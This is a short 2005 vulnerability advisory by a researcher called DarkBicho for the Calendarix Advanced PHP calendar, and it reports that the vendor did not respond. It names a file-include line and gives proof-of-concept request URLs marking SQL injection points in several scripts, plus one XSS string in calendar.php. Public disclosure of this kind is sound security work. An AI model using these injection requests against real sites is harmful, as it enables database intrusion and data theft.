multiple vulnerability Calendarix Advanced
/***********************************************
* Advisorie : 01-0005-15
* title: multiple vulnerability
* Software: Calendarix Advanced
* Date: 28. April 2005
* Web: http://www.calendarix.com/
************************************************/
- Affected software description:
Webcalendar is a web software write in php y mysql
- Expoit:
Include
line 16
admin/cal_admintop.php:include_once ($calpath."cal_utils.php");
xss and sql injection
line 122 - 160
cal_day.php?op=day&date=2005-05-03&catview=1[sql]/*
cal_pophols.php?id=999'[sql]/*
line 23
calendar.php?op=cal&month=5&year=2'%3Ch1%3DarkBicho005&catview=1
line 194 - 196
cal_week.php?op=week&catview= 999'[sql]/*
line 34 - 39
cal_cat.php?op=cats&catview=999'[sql]*/
- How to fix:
Vendor no responds
- Credits:
DarkBicho
Email: darkbicho@xxxxxxxxx
Web: http://www.swp-scene.org
- Grettings:
"A mi Team SWP"
" Viva el Peru Carajo"
--
- - - - - - - - - - - - - - - - - - - - - - - - -
Miguel Sumaran (DarkBicho)
webpage: http://www.darkbicho.tk/
Team : http://www.swp-scene.org/
Made in Peru
- - - - - - - - - - - - - - - - - - - - - - - - -